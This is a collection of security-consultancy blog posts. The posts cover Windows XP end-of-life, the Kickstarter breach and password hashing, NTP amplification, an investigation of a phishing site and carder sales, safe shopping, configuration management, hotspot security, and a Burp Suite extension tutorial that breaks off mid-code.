Putting Windows XP Out To Pasture

Farewell, Windows XP! We hated you, then loved you, and soon we’ll hate you again.

 (This post is a resource for home and small-business users with questions about the impending end-of-life for Windows XP. Larger enterprise users have some different options available to them; contact us to discuss your situation and options.)

For those who haven’t seen it in the news yet: Microsoft will be ending support for its hugely successful operating system, Windows XP, on April 8th. This means that users of the 12-year-old operating system will no longer be able to get updates, and in particular will not be able to get security updates. Users of more modern versions of Windows, such as Windows Vista or Windows 7 will remain supported for several more years.

Once support ends, computers still on Windows XP will become a very juicy target for Internet criminals and attackers. Internet crime is big business, so every day there are criminals looking for new weaknesses in computer systems (called vulnerabilities), and developing attacks to take advantage of them (these attacks are called exploits). Normally, the software vendor (Microsoft in this case) quickly finds out about these weaknesses and releases updates to fix them. When an exploit is developed, some number of people fall victim shortly after the exploit is first used, but people who get the update in a relatively timely manner are protected.

But what happens when a vendor stops updating the software? All of a sudden, the bad guys can use these same attacks, the same exploits, indefinitely. As a product nears end of life, attackers have an incentive to hold off on using critical vulnerabilities until the deadline passes. The value of their exploits goes up significantly once they have confidence that the vendor will never patch it. Based on that, we can expect a period of relative quiet in terms of announced vulnerabilities affecting XP from now until shortly after the deadline, when we will likely see stockpiled critical vulnerabilities begin circulating. From then on, the risk of these legacy XP systems will continue to increase, so migrating away from XP or dramatically isolating the systems should be a priority for people or organizations that still use them.

How do I know if I’m running Windows XP?

  • If your computer is more than 5 years old, odds are it is running Windows XP
  • Simplest way: “Win+Break”: Press and hold down the Windows key on your keyboard, then find the “Pause” or “Break” key and press it. Let both keys go. That will show the System Properties windows. You may have to hunt around for your “Pause/Break” key, but hey, it finally has a use.
  • Alternate way: Click the Start Menu -> Right click on “My Computer” -> On the menu that comes out, click on Properties

 

Image

Click the Start Menu, then right-click My Computer, then click Properties.

 

Image

Your version of Windows will be the first thing on the System Properties window.

 

How do I stay safe?

Really, you should think about buying a new computer. You can think of it as a once a decade spring cleaning. If your computer is old enough to have Windows XP, having an unsupported OS is likely just one of several problems. It is possible to upgrade your old computer to a newer operating system such as Windows 7, or convert to a free Linux-based operating system, but this may be a more complicated undertaking than many users want to tackle.

Any computer you buy these days will be a huge step up from a 7-year old (at least!) machine running XP, so you can comfortably shop the cheapest lines of computers. New computers can be found for $300, and it’s also possible to buy reputable refurbished ones with a modern operating system for $100-$200.

For those who really don’t want to or can’t upgrade, the situation isn’t pretty. Your computer will continue to work as it always has, but the security of your system and your data is entirely in your hands. These systems have been low-hanging fruit for attackers for a long time, but after April 8th they will have a giant neon bull’s-eye on them.

There are a few things you can do to reduce your risks, but there really is no substitute for timely vendor patches.

  1. Only use the system for tasks that can’t be done elsewhere. If the reason for keeping an XP machine is to run some specific program or piece of hardware, then use it only for that. In particular, avoid web browsing and email on the unsupported machine: both activities expose the vulnerable system to lots of untrusted input.
  2. Keep all of your other software up to date. Install and use the latest version of Firefox or Chrome web browsers, which won’t be affected by Microsoft’s end of life.
  3. Back up your computer. There are many online backup services available for less than $5 a month. If something goes wrong, you want to make sure that your data is safe. Good online backup services provide a “set it and forget it” peace of mind. This is probably the single most important thing you can do, and should be a priority even for folks using a supported operating system. Backblaze, CrashPlan, and SpiderOak are all reasonable choices for home users.
  4. Run antivirus software, and keep it up to date. AVAST, AVG, and Bitdefender are all reasonable free options but be aware that antivirus is only a layer of protection: it’s not perfect.

 

What Kickstarter Did Right

Only a few details have emerged about the recent breach at Kickstarter, but it appears that this one will be a case study in doing things right both before and after the breach.

What Kickstarter has done right:

  • Timely notification
  • Clear messaging
  • Limited sensitive data retention
  • Proper password handling

Timely notification

The hours and days after a breach is discovered are incredibly hectic, and there will be powerful voices both attempting to delay public announcement and attempting to rush it. When users’ information may be at risk beyond the immediate breach, organizations should strive to make an announcement as soon as it will do more good than harm. An initial public announcement doesn’t have to have all the answers, it just needs to be able to give users an idea of how they are affected, and what they can do about it. While it may be tempting to wait for full details, an organization that shows transparency in the early stages of a developing story is going to have more credibility as it goes on.

Clear messaging

Kickstarter explained in clear terms what was and was not affected, and gave straightforward actions for users to follow as a result. The logging and access control groundwork for making these strong, clear statements at the time of a breach needs to be laid far in advance and thoroughly tested. Live penetration testing exercises with detailed post mortems can help companies decide if their systems will be able to capture this critical data.

Limited sensitive data retention

One of the first questions in any breach is “what did they get?”, and data handling policies in place before a breach are going to have a huge impact on the answer. Thinking far in advance about how we would like to be able to answer that question can be a driver for getting those policies in place. Kickstarter reported that they do not store full credit card numbers, a choice that is certainly saving them some headaches right now. Not all businesses have quite that luxury, but thinking in general about how to reduce the retention of sensitive data that’s not actively used can reduce costs in protecting it and chances of exposure over the long term.

Proper password handling (mostly)

Kickstarter appears to have done a pretty good job in handling user passwords, though not perfect. Password reuse across different websites continues to be one of the most significant threats to users, and a breach like this can often lead to ripple effects against users if attackers are able to obtain account passwords.

In order to protect against this, user passwords should always be stored in a hashed form, a representation that allows a server to verify that a correct password has been provided without ever actually storing the plaintext password. Kickstarter reported that their “passwords were uniquely salted and digested with SHA-1 multiple times. More recent passwords are hashed with bcrypt.” When reading breach reports, the level of detail shared by the organization is often telling and these details show that Kickstarter did their homework beforehand.

A strong password hashing scheme must protect against the two main approaches that attackers can use: hash cracking, and rainbow tables. The details of these approaches have been well-covered elsewhere, so we can focus on what Kickstarter used to make their users’ hashes more resistant to these attacks.

To resist hash cracking, defenders want to massively increase the amount of work an attacker has to do to check each possible password. The problem with hash algorithms like SHA1 and MD5 is that they are too efficient; they were designed to be completed in as few CPU cycles as possible. We want the opposite from a password hash function, so that it is reasonable to check a few possible passwords in normal use but computationally ridiculous to try out large numbers of possible passwords during cracking. Kickstarter indicated that they used “multiple” iterations of the SHA1 hash, which multiplies the attacker effort required for each guess (so 5 iterations of hashing means 5 times more effort). Ideally we like to see a hashing attempt take at least 100 ms, which is a trivial delay during a legitimate login but makes large scale hash cracking essentially infeasible. Unfortunately, SHA1 is so efficient that it would take more than 100,000 iterations to raise the effort to that level. While Kickstarter probably didn’t get to that level (it’s safe to assume they would have said so if they did), their use of multiple iterations of SHA1 is an improvement over many practices we see.

To resist rainbow tables, it is important to use a long, random, unique salt for each password. Salting passwords removes the ability of attackers to simply look up hashes in a precomputed rainbow tables. Using a random, unique salt on each password also means that an attacker has to perform cracking on each password individually; even if two users have an identical password, it would be impossible to tell from the hashes. There’s no word yet on the length of the salt, but Kickstarter appears to have gotten the random and unique parts right.

Finally, Kickstarter’s move to bcrypt for more recent passwords is particularly encouraging. Bcrypt is a modern key derivation function specifically designed for storing password representations. It builds in the idea of strong unique salts and a scalable work factor, so that defenders can easily dial up the amount computation required to try out a hash as computers get faster. Bcrypt and similar functions such as PBKDF2 and the newer scrypt (which adds memory requirements) are purpose built make it easy to get password handling right; they should be the go-to approach for all new development, and a high-priority change for any codebases still using MD5 or SHA1.

On NTP distributed denial of service attacks

NTP, network time protocol, is a time synchronization protocol that is implemented on a network protocol called UDP. UDP is designed for speed at the cost of simplicity, which plays into the inherent time-sensitivity (or specifically, jitter sensitivity) of NTP. Time is an interesting scenario in computer security. Time isn’t exactly secret; it has relatively minor confidentiality considerations, but in certain uses it’s exceedingly important that multiple parties agree on the time. Engineering, space technology, financial transactions and such.

At the bottom is a simple equation:

denial of service amplification = bytes out / bytes in

When you get to a ratio > 1, a protocol like NTP becomes attractive as a magnifier for denial of service traffic.

UDP’s simplicity makes it susceptible to spoofing. An NTP server can’t always decide whether a request is spoofed or not; it’s up to the network to decide in many cases. For a long time, operating system designers, system implementers, and ISPs did not pay a lot of attention to managing or preventing spoofed traffic. It was and is up to millions of internet participants to harden their networking configuration to limit the potential for denial of service amplification. Economically there’s frequently little incentive to do so – most denial of service attacks target someone else, and the impact to being involved as a drone is relatively minor. As a result you get systemic susceptibility.

My advice is for enterprises and individuals to research and implement network hardening techniques on the systems and networks they own. This often means tweaking system settings, or in certain cases may require tinkering with routers and switches. Product specific hardening guides can be found online at reputable sites. As with all technology, the devil is in the details and effective management is important in getting it right.

Gutting a Phish

In the news lately there have been countless examples of phishing attacks becoming more sophisticated, but it’s important to remember that entire “industry” is a bell curve: the most dedicated attackers are upping their game, but advancements in tooling and automation are also letting many less sophisticated players get started even more easily. Put another way, spamming and phishing are coexisting happily as both massive multinational business organizations and smaller cottage-industry efforts.

One such enterprising but misguided individual made the mistake of sending a typically blatant phishing email to one of our Neohapsis mailing lists, and someone forwarded it along to me for a laugh.

Initial Phish Email

The phishing email, as it appeared in a mailbox

As silly and evident as this is, one thing I’m constantly astounded by is how the proportion of people who will click never quite drops to zero. Our work on social engineering assessments bears out this real world example: with a large enough sample set, you’ll always hook at least one. In fact, a paper out of Microsoft Research suggests that, for scammers, this sort of painfully blatant opening is actually an intentional tool: it acts as a filter that only the most gullible will pass.

Given the weak effort put into the email, I was curious to see if the scam got any better if someone actually clicked through. To be honest, I was pleasantly surprised.

Phish Site

The phishing site: a combination of legitimate Apple code and images and a form added by the attacker

The site is dressed up as a reasonable approximation of an official Apple site. In fact, a look at the source shows that there are two things going on here: some HTML/CSS set dressing and template code that is copied directly from the legitimate Apple site, and the phishing form itself which is a reusable template form created by one of the phishers.

Naturally, I was curious where data went once the form was submitted. I filled in some bogus data and submitted it (the phishing form helpfully pointed out any missing data; there is certainly an audacity in being asked to check the format of the credit card number that’s about to be stolen). The data POST went back to another page on the same server, then quickly forwarded me on to the legitimate iTunes site.

Submit and Forward Burp -For Blog

This is another standard technique: if a “login” appears to work because the victim was already logged in, the victim will often simply proceed with what they were doing without questioning why the login was prompted in the first place. During social engineering exercises at Neohapsis, we have seen participants repeatedly log into a cloned attack site, with mounting frustration, as they wonder why the legitimate site isn’t showing them the bait they logged in for.

Back to this phishing site: my application security tester spider senses were tingling, so I felt that I had to see what our phisher was doing with the data being submitted. To find out, I replayed the submit request with various types of invalid data, strings that should cause errors depending on how the data was being parsed or stored. Not a single test string produced any errors or different behavior. This could be an indication that any parsing and processing is being done carefully and correctly, but the far more likely case is that they’re simply doing no processing and dumping it all straight out as plain text.

Interesting… if harvested data is just being simply dumped to disk, where exactly is it going? Burp indicates that the data is being POSTed to a harvester script at Snd/Snd.php. I wonder what else is in that directory?

directory listing

Under the hood of the phishing site, the loot stash is clearly visible

That results.txt file looks mighty promising… and it is.

result.txt

The format of the result.txt file

These are the raw results dumped from victims by the harvester script (Snd.php). The top entry is dummy data that I submitted, and when I checked it, the file was entirely filled with the various dummy submissions I had done before. It’s pretty clear from the results that I was the first person to actually click through and submit data to the phish site; actually pretty fortunate, because if a victim did enter legitimate information, the attacker would have to sort it out from a few hundred bogus submissions. Any day that we can make life harder for the the bad guys is a good day.

So, the data collection is dead simple, but I’d still like to know a bit more about the scam and the phishers if possible. There’s not a lot to go on, but the tag at the top of each entry seems unique. It’s the sort of thing we’re used to seeing when hackers deface a website and leave a tag to publicize the work:

------------+| $ o H a B  Dz and a m i r TN |+------------

Googling some variations turned up Google cache of a forum post that’s definitely related to the phishing site above; it’s either the same guy, or someone else using the same tool.

AppleFullz Forum post

A post in a carder forum, offering to sell data in the same format as generated by the phishing site above

A criminal using the name AppleFullz is selling complete information dumps of login details and credit card numbers plus CVV numbers (called “fulls” in carder forums) captured in the exact format that the Apple phish used, and even provides a sample of his wares (Insult to injury for the victim: not only was his information stolen, but it’s being given away as the credit card fraud equivalent of the taster trays at the grocery store). This carder is asking for $10 for one person’s information, but is willing to give bulk discounts: $30 for 5 accounts (This is actually a discount over the sorts of prices normally seen on carder forums; Krebs recently reported that Target cards were selling for $20-$100 per card. I read this as an implicit acknowledgement by our seller that this data is much “dirtier” and that the seller is expecting buyers to mine it for legitimate data). The tools being used here are a combination of some pre-existing scraps of  PHP code widely used in other spam and scam campaigns (the section labeled “|INFO|VBV|”), and a separate section added specifically to target Apple ID’s.

Of particular interest is that the carder provided a Bitcoin address. For criminals, Bitcoin has the advantage of anonymity but the disadvantage that transactions are public. This means that we can actually look up how much money has flowed into that particular Bitcoin address.

blockchain

Ill-gotten gains: the Bitcoin blockchain records transfers into the account used for selling stolen Apple Id’s and credit card numbers.

From November 17, when the forum posting went up, until December 4th, when I investigated this phishing attempt, he has received Bitcoin transfers totaling 0.81815987 BTC, which is around $744.53 (based on the BTC value on 12/4). According to his price sheet, that translates to a sale of between 74 and 124 records: not bad for a month of terribly unsophisticated phishing.

Within a few hours of investigating the initial phishing site, it had been removed. The actual server where the phish site was hosted was a legitimate domain that had been compromised; perhaps the phisher noticed the volume of bogus traffic and decided that the jig was up for that particular phish, or the system administrator got tipped off by the unusual traffic and investigated. Either way the phish site is offline, so that’s another small victory.

5 Tips for Safer Online Shopping

Use good password practices

No surprise here – it seems to be on the top of every list of this kind, but people still don’t listen. Passwords are still (and will continue to be) the weakest form of authentication. In a perfect security utopia passwords would not exist, but since we’re not there (yet) everyone relies on them. The two main rules on passwords are: make them complex, and make them unique. Complex doesn’t necessarily mean you need thirty random character monstrosities that only a savant could remember, but avoid dictionary words and don’t think that you’re safe by just appending numbers or special characters. The first thing an attacker will do is take every English word in the dictionary and append random characters to the end of it. Yep, “password1989!” is just as (in)secure as “password”. Lastly, passwords should be unique to each site. This is an even bigger sin that most people (myself included) are guilty of. We have one good password so we use it for everything. The problem with this is obvious: if it gets compromised an attacker has access to everything. When LinkedIn’s passwords were compromised last year I realized I was using the same password for all my social media accounts, leaving all those vulnerable too. You don’t need to make an attacker’s job easier for him or her by reusing passwords. Make them work for each one they need to crack.

Store sensitive data in secure locations

Hopefully, you’ve followed the first rule and have unique, complex passwords for every site you visit. Now, how to remember them all? This is where I love to recommend password managers. Password managers securely store all your log in information in an easily accessible location. I emphasize “securely” here, because I see far too many people with word documents called “My Passwords” or the like sitting on their desktops. This is a goldmine for any attacker who has access to it. I’ve even seen theses “password” files being shared unencrypted in the cloud, so people can pull them up on their phones or tablets to remember their passwords on-the-go. Please don’t do this. Now if you lose your phone you also lose every password to every secure site you have.

Instead, use a password manager like 1PasswordLastPass, or KeepPass to name a few popular ones. These encrypt and store your sensitive information (not just passwords, but also SSNs, CC numbers, etc..) in an easy to access format. You encrypt your “wallet” of passwords with one very secure password (the only one you ever need to remember), and can even additionally encrypt them with a private key. A private key works just like a physical key – you need a copy of it to access the file. Keep it on a USB stick on your keychain and a backup in a fire-proof safe.

Watch out for HTTP(S)

Ever notice how some sites start with https:// as opposed to http:// ? That little ‘s’ at the end makes a whole world of difference. When it’s present it means that you have established a trusted and encrypted connection with the website. Its security purpose is two-fold: all data between you and the site is encrypted and cannot be eavesdropped, and you have established through a chain of trust that the website you are visiting is, in fact, who they say they are.

For example, this is what the address bar on Firefox looks like when I have a secure connection to Bank of America:

https bar

Notice the ‘https’ and the padlock icon. If you are ever on a webpage that is asking you to enter sensitive information (like a password) and you don’t see something similar, don’t enter it! There could be any number of reasons why you are not connected via HTTPS, including benign ones, but it’s better to be safe than sorry. Likewise, if you ever receive a warning from your browser like this:

https error

It means that the browser cannot verify the website is actually who it says it is. Phishing sites can imitate legitimate logins down to the smallest detail, but they cannot imitate their SSL certificate. If you see this type of warning when trying to access a well-known site, get out immediately! There could be legitimate problem with the website or your browser, but more likely somebody is impersonating them and trying to fool you!

Install those nagging updates

Microsoft actually does an excellent job of patching vulnerabilities when they arise; the problem is most people don’t install them. Every other Tuesday new patches and updates are released to the public. Microsoft will also release patches out-of-bounds (OOB), meaning as needed and not waiting for the next Tuesday, for serious vulnerabilities. These patches are a great way to fix security holes but also offer a nasty catch. Attackers use these patches to see where the holes were.

Every “Patch Tuesday” attackers will reverse engineer the Windows updates to discover new vulnerabilities and then attempt to target machines that have not applied the update yet. It’s akin to a car manufacturer releasing a statement saying “this year and model car can be unlocked with a toothpick, so apply this fix.” Now every car thief in the world knows to look out for that year and model, and if the fix hasn’t been applied they know to try a toothpick.

This is why it’s imperative to keep your computer up to date. The “Conficker” worm that ran rampant in 2009 exploited a security vulnerability that was patched by Microsoft almost immediately. Part of the reason it spread so successfully was people’s reluctance to install new Windows updates. It preyed on out-of-date systems.

Likewise, many online exploits will use common vulnerabilities found in different software, like Flash, Java, or even the browsers. When software that you use online prompts you to install an update – do it!

So the next time your computer asks you to restart to install updates, go grab a cup of coffee and let it do its thing. It’ll save you in the long run.

(note: Mac users are not exempt! Install those updates from Apple as well!)

It’s okay to be a little paranoid

My last tip is more of a paradigm shift than a tip for when you are conducting business online. It’s okay to be a little paranoid. The old mantra “if it’s too good to be true, it probably is” has never been more applicable when it comes to common phishing schemes. I’m sure most people know by now to not trust a pop-up that says “You’ve won an iPad – click here!”, but modern phishing techniques are much more subtle – and much more dangerous.

One of the only times I’ve ever fallen victim to a phishing scheme was when “Paypal” emailed me asking me to confirm a large purchase because it was suspicious. Since I didn’t make the order I immediately thought I had been compromised. I went into panic mode, clicked the link, entered my password….and, wait, I just entered my Paypal password into a site I don’t even recognize. They got me.

It’s okay to mistrust emails and links. If something seems phishy (pun intended) then exit out. Services like Paypal and online banks will never ask for personal information over email, chat, or any avenue besides their main website. If you have an issue, go to their website, ensure that ‘s’ is in your address bar, and do your business from there. If you’re still not convinced, find their 800 number and call them. The point is, if I had stayed calm for a second and thought it was strange Paypal was asking me to urgently log in via an email message, I would have gathered myself, gone to their official site to log in and then looked for any alerts or suspicious activity. I could have even called them.

Trying not to sound too misanthropic here, but when it comes to dealing with sensitive information online it’s better to not trust someone initially then it is to trust them implicitly. Your bank account information won’t be deleted and nothing bad will happen if you don’t immediately update your password, so take a second to make sure what you’re doing is actually legit.

Configuration Assurance: Evolving Security Beyond the Basics

Perhaps it is more appropriate for us to approach configuration management as an assurance process meant to ensure system integrity is maintained over time. By evolving our view of how to establish and control the integrity of the different devices and technologies in use, the concept of “configuration management” evolves to become more about “configuration assurance.”

The Need to Manage Configuration 

When considering the different aspects of information security program management, few topics are of as much importance to an organization’s overall security posture as the topic of “configuration management.” This is due, in part, to the number of different standards and processes that typically comprise or govern a configuration management program. And, it is usually the lack of governance or enforcement of configuration management practices that lead to system and information compromises.

When we look at configuration management, it is important for us to keep in mind that what we’re really addressing is the “I” of InfoSec’s “Confidentiality, Integrity, and Availability,” or “C.I.A.” Because of this, we should understand each of the different parts that make up a configuration management program or process, and further understand them as part of an overall process for ensuring the integrity of any given device or system. Ultimately, the basis for establishing and verifying the integrity of a device or system needs to be consistent with the information security standards defined by the organization, industry best practices, industry or governmental regulation, and relevant legislative requirements.

The Basics of Configuration Management 

The objective of any meaningful configuration management program is a security-minded framework within which all information systems can be tracked, classified, reviewed, analyzed, and maintained according to a consistent set of practices and standards. Configuration management programs usually incorporate several different standards and processes to address the diverse aspects of information security, such as standard build/configuration documentation and processes, antivirus monitoring, patch management, vulnerability management, asset management, etc. Essentially, it comes down to having lot of eggs that ultimately wind up in the same basket, with the objective being that none of the egg shells get broken.

At a high level, the functional and security requirements for most of these programs and services are fairly well understood. It is common for organizations to treat each of the different aspects of configuration management as stand-alone programs or processes. However, reality is quite different. In addition to ensuring that a configuration management program addresses all of the relevant security requirements, it is also equally necessary to understand how each individual security process or program relates to other security processes or programs. Why? Because each of the processes associated with configuration management impacts other processes related to configuration management. The manner in which these interrelationships are addressed (or not addressed) may expose significant risks in critical or sensitive information systems.

Regardless, many organizations still tend to approach delivery of these programs and services as individual and somewhat isolated or unrelated processes. This is especially true for organizations that heavily focus on meeting compliance requirements without embracing the larger concept of “information security.” This is also true in organizations where information security programs are less mature, or if there is an over-reliance on technology in the absence of formal documentation.

Where the Gaps May Lie

Following are a couple of examples where gaps might typically occur in the configuration management process. After each example, I’ve put together a few follow-up questions to help explore each issue a little more in-depth.

A. Auditing and Log Monitoring – Most security policies and system configuration standards tend to address audit and logging requirements at the operating system level. However, operating system audit log services are not always capable of capturing detailed audit log data generated by some applications or services. As a result, it may be necessary to combine and correlate multiple audit log data sources (perhaps from multiple devices) to reconstruct a specific chain of events. All business processes should be reviewed to ensure that the full complement of required audit log data is being collected and reviewed.

  1. Do your policies, standards, and processes ensure that all required security audit log data is collected for any and all firewalls/routers, workstations, critical/sensitive applications, databases, monitoring technologies, and other relevant security devices or technologies used in the environment?
  2. Do policies or standards require audit log data collection to include audit log data from all antivirus endpoints, file integrity monitoring endpoints, IDS/IPS alerts and events, security devices or applications, and file or database access?
  3. Is all audit log data, of all types, collected to a single or centralized source(s)?
  4. Is all audit log data backed up regularly (at least daily) and protected against unauthorized access or modification?
  5. Is audit log data from one source combined and correlated with audit log data from other devices or services to reconstruct specific activities, identify complex attacks, and/or raise appropriate alerts?
  6. Has your organization performed any testing or forensic activities to verify that audit log information currently being collected is sufficient to raise appropriate alerts and reconstruct the events related to any suspicious activity?

B. Standard Build/Configuration – It is commonplace for organizations to have standards documentation describing how to install and configure the different kinds of operating systems (and sometimes databases) used in the environment. However, it is not quite so common to have similar documentation (or similar level of detail) when it comes to some specialized technologies or functions. As we are all aware, a secure technical environment is reliant upon more than just securing the operating systems and extends to all devices in use. Policies, standards, and processes should exist to address all technologies used in the environment and should define how to establish, maintain, and verify the integrity of any device or application intended for use within the environment.

  1. Do documentation and processes currently exist to define the secure initial configuration of all technology device types and applications in use in the environment? This includes technologies or devices such as firewalls, routers, servers, databases, mainframe/mid-range, wireless technologies and devices, mobile computing devices (laptops and smartphones), workstations, point-of-interaction devices, IVR systems, and any other technologies related to establishing, enforcing, or monitoring security posture or controls.
  2. Are configuration standards cross-checked to ensure that all relevant information security subject areas are addressed or appropriately cross-referenced? For example, do OS configuration standards include details for installing antivirus or other critical software (FIM, patch management, etc.)? If not, is a reference provided to supporting documentation that details how to install antivirus or other critical software for each specific operating system type?
  3. Do documentation and processes currently exist to define not just the secure configuration of the base operating system, but also to define a minimum patch level or version a system must meet (e.g., “Win7 SP2″ or “Apache version X.X.Y”) before being permitted to connect to the network environment?

These are clearly not all of the possible intersections or gaps that might occur in how an organization approaches configuration management. In developing an information security program, each organization will need to identify the relevant services, processes, and programs that represent how configuration management is achieved. As part of a process of constant improvement, the next logical step would then be to take a closer look at the internal process interrelationships and try to identify any gaps that might exist.

Where to from here?

By evolving our view of how to establish and control the integrity of the different devices and technologies, the concept of “configuration management” evolves to become more about “configuration assurance.” Instead of approaching configuration management as a somewhat unregulated process kept in check by periodic review (audit), perhaps it is more appropriate for us to approach configuration management as an assurance process meant to ensure system integrity is maintained over time.

In the end, one of the biggest enemies of information security is time. Because even if you have bullet-proof security controls in place today, they will probably not offer much protection  against the vulnerability/exploit that a hacker will identify tonight or a vendor will announce tomorrow (or Tuesday).

Security Best Practices With Mobile Hotspots

The use of mobile hotspots has skyrocketed over the last couple years, and with the release of 4G, it’s pretty obvious why. Not only for the added mobility, either. I can personally always rely on my smartphone’s 4G service being fasterand more reliable, on top of possibly being more secure than the shared hotel or coffee shop wireless. I say possibly, because just enabling your mobile hotspot feature on your phone doesn’t necessarily make it a more secure option. In fact, if you’re using the default settings for your mobile hotspot, it’s very likely this isn’t the case. This brings about the usual risks with an attacker having unauthorized access, with the addition to risk to data usage. Unless you’ve got an unlimited data plan (do those even exist?), an attacker can potentially cause data usage by going over your allotted monthly limit.

Configure Your Mobile Hotspot

With that, I would like to provide some tips and best practices to ensure that you are secure when using your mobile hotspot. Some of these tips aren’t new in securing access points in general, so they likewise apply, however I have tailored these recommendations to be more specific to hotspots. So, here they are, without any particular order of importance:

1. Use Obscure SSIDs

Before I dive into this, let me explain a little on what I mean by an SSID. SSID is an acronym which stands for “Service Set Identification,” which, as most technical acronyms, doesn’t do a great job explaining what it actually is. Simply put, the SSID is just the name you are going to give your hotspot so that your other devices can identify it. For example, when you go to pick a wireless network, all the wireless network names you see out there are their SSIDs. With that said, most hotsposts will come with defaults, usually on the realm of “Verizon Mobile Hotspot”, for example. It’s best to avoid using the default names such as “Verizon Mobile Hotspot” or even custom ones such as “Tammy’s iPhone” for your SSID, as these names give an attacker some idea of the service and/or model device being used, which in turn allows them to target based on the default settings for these devices. Take this opportunity to use something creative, such as “NSA Surveillance”. Attackers will have a more difficult time profiling your hotspot, plus you’ll probably give some people a good chuckle. Another port to note regarding your SSID is that hiding your SSID isn’t necessary, as an attacker would be able to discover your “hidden” SSID with little effort, anyway.

Obscure SSID

2. WPA2 Security – Always

Most hotspots will give you the option to change the security encryption being used. This typically ranges from options such as Open, which is no encryption or passcode needed, all the way to WPA2 PSK, which is the latest standard and uses a very high level of encryption. Always be sure to use WPA2 security when setting up a hotspot. All smartphones that provide hotspot functionality should have this as an option, and if they don’t, it’s probably time to upgrade it to one that does. WPA is the only exception to this in that even though it’s not as secure as WPA2, it’s still very secure when combined with a complex enough passcode (which is covered next). WEP encryption should be completely avoided since anyone with $30 and access to Google can gain step-by-step instructions on how to crack the passcode within about 5 minutes. If your hotspot supports the option to use WPS, it’s recommended that this is disabled as well, as there is a known vulnerability that can allow an attacker to obtain the WPA passcode by bruteforcing the WPS PIN.

WPA2 Security

 

3. Use Complex Passwords

Even though this is probably fairly obvious, having a complex password is just about the most important component to securing your mobile hotspot. A common myth is that since your hotspot is only on when you need access, its not likely that an attacker will guess your passcode in the allotted time frame. However, with the way WPA works an attacker only needs enough time to capture the handshake, then they can attempt to crack the password offline. There are many different good (and bad) methods to coming up with complex passwords. However given that the nature of a mobile hotspot is to turn it on only when needed, my recommendation is to strive for a passcode that’s complex enough, as well as change the passcode every time you use your hotspot. The goal is that your passcodes are complex enough that an attacker cannot reasonably crack it in the allotted time, and even if they wanted to crack it offline, the cracked passcode would be useless because it will change the next time you use it. The challenge then becomes in coming up with a complex enough password every time you go to use your hotspot.  In cases like this, I am a big fan of the strategy put together over at XKCD.com, which is to take four random common words and put them together to form the password. For example, orange + finger + core + sleepy. This makes passwords easy to come up with, as well as remember, while providing enough entropy that it an attacker couldn’t reasonably crack it.

4. Turn It Off When Done

This one may seem a bit obvious as well, but since I’m even guilty for this one, I thought it was worthy enough for its own section. Turning it off when you aren’t using it is not only easier on your data usage (and monthly charges), but lowers the chance a potential attacker might have to attempt hijacking access to your hotspot as well. Now if you’re as absent minded as I am, many hotspots come with an inactivity timeout option, which will automatically shut it off after X minutes of inactivity.

Inactivity Timeout

5. Avoid The Defaults

This is more of a blanket statement that touches the other two areas as well, but most of the default settings for setting up your mobile hotspot should be avoided, with WPA2 Security being just about the only exception, it’s good to avoid any of the default settings in general. The default passcode being changed is the most important to note, even if the passcode meets  the complexity requirements in step 3, as it’s possible this passcode is re-used and can be a part of an attacker’s dictionary attempts.

Complete Settings

That’s it! Follow these tips as a best practice and enjoy the freedom for high-speed Internet anywhere you go (or at least anywhere you have 4G). If you have any questions or comments, feel free to connect with me through Twitter @tehcolbysean.

Burp Extensions in Python & Pentesting Custom Web Services

A lot of my work lately has involved assessing web services; some are relatively straightforward REST and SOAP type services, but some of the most interesting and challenging involve varying degrees of additional requirements on top of a vanilla protocol, or entirely proprietary text-based protocols on top of HTTP. Almost without fail, the services require some extra twist in order to interact with them; specially crafted headers, message signing (such as HMAC or AES), message IDs or timestamps, or custom nonces with each request.

These kind of unusual, one-off requirements can really take a chunk out of assessment time. Either the assessor spends a lot of time manually crafting or tampering with requests using existing tools, or spends a lot of time implementing and debugging code to talk to the service, then largely throws it away after the assessment. Neither is very good use of time.

Ideally, we’d like to write the least amount of new code in order to get our existing tools to work with the new service. This is where writing extensions to our preferred tools becomes massively helpful: a very small amount of our own code handles the unusual aspects of the service, and then we’re able to take advantage of all the nice features of the tools we’re used to as well as work almost as quickly as we would on a service that didn’t have the extra proprietary twists.

Getting Started With Burp Extensions

Burp is the de facto standard for professional web app assessments and with the new extension API (released December 2012 in r1.5.01) a lot of complexity in creating Burp extensions went away. Before that the official API was quite limited and several different extension-building-extensions had stepped in to try to fill the gap (such as Hiccup, jython-burp-api, and Buby); each individually was useful, but collectively it all resulted in confusing and contradictory instructions to anyone getting started. Fortunately, the new extension API is good enough that developing directly against it (rather than some intermediate extension) is the way to go.

The official API supports Java, Python, and Ruby equally well. Given the choice I’ll take Python any day, so these instructions will be most applicable to the parseltongues.  Getting set up to use or develop extensions is reasonably straightforward (the official Burp instructions do a pretty good job), but there are a few gotchas I’ll try to point out along the way.

  1. Make sure you have a recent version of Burp (at least 1.5.01, but preferably 1.5.04 or later where some of the early bugs were worked out of the extensions support), and a recent version of Java
  2. Download the latest Jython standalone jar. The filename will be something like “jython-standalone-2.7-b1.jar” (Event though the 2.7 branch is in beta I found it plenty stable for my use; make sure to get it so that you can use Python 2.7 features in your extensions.)
  3. In Burp, switch to the Extender tab, then the Options sub-tab. Now, configure the location of the jython jar.ConfigureJython
  4. Burp indicates that it’s optional, but go ahead and set the “Folder for loading modules” to your python site-packages directory; that way you’ll be able to make use of any system wide modules in any of your custom extensions (requests, passlib, etc). (NOTE: Some Burp extensions expect that this path will be set to the their own module directory. If you encounter errors like “ImportError: No module named Foo”, simply change the folder for loading modules to point to wherever those modules exist for the extension.)
  5. The official Burp docs include one other important step:

    Note: Because of the way in which Jython and JRuby dynamically generate Java classes, you may encounter memory problems if you load several different Python or Ruby extensions, or if you unload and reload an extension multiple times. If this happens, you will see an error like:

    java.lang.OutOfMemoryError: PermGen space

    You can avoid this problem by configuring Java to allocate more PermGen storage, by adding a -XX:MaxPermSize option to the command line when starting Burp. For example:

    java -XX:MaxPermSize=1G -jar burp.jar

  6. At this point the environment is configured; now it’s time to load an extension. The default one in the official Burp example does nothing (it defines just enough of the interface to load successfully), so we’ll go one step further. Since several of our assessments lately have involved adding some custom header or POST body element (usually for authentication or signing), that seems like a useful direction for a “Hello World”. Here is a simple extension that inserts data (in this case, a timestamp) as a new header field and at the end of the body (as a Gist for formatting). Save it somewhere on disk.
    # These are java classes, being imported using python syntax (Jython magic)
    from burp import IBurpExtender
    from burp import IHttpListener
    
    # These are plain old python modules, from the standard library
    # (or from the "Folder for loading modules" in Burp>Extender>Options)
    from datetime import datetime
    
    class BurpExtender(IBurpExtender, IHttpListener):
